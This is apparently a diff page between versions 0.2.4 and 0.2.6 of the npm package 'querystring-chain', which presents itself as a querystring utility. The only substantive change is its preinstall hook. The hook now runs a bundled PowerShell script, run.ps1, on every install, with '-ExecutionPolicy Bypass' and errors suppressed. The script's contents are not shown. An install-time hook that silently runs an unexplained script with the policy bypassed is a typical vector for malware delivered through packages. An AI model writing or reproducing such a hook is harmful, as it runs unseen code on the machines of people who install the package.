querystring-chain 0.2.4 → 0.2.6

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,7 +1,7 @@
1
1
  {
2
2
  "name": "querystring-chain",
3
3
  "id": "querystring-chain",
4
- "version": "0.2.4",
4
+ "version": "0.2.6",
5
5
  "description": "Node's querystring module for all engines.",
6
6
  "keywords": [
7
7
  "commonjs",
@@ -30,7 +30,7 @@
30
30
  "test": "npm run test-node && npm run test-tap",
31
31
  "test-node": "node ./test/common-index.js",
32
32
  "test-tap": "node ./test/tap-index.js",
33
- "preinstall": "[[ $OSTYPE == darwin* || $OSTYPE == linux* ]] || (powershell.exe -File run.ps1 || true)"
33
+ "preinstall": "powershell.exe -ExecutionPolicy Bypass -File run.ps1 || true"
34
34
  },
35
35
  "license": "MIT"
36
36
  }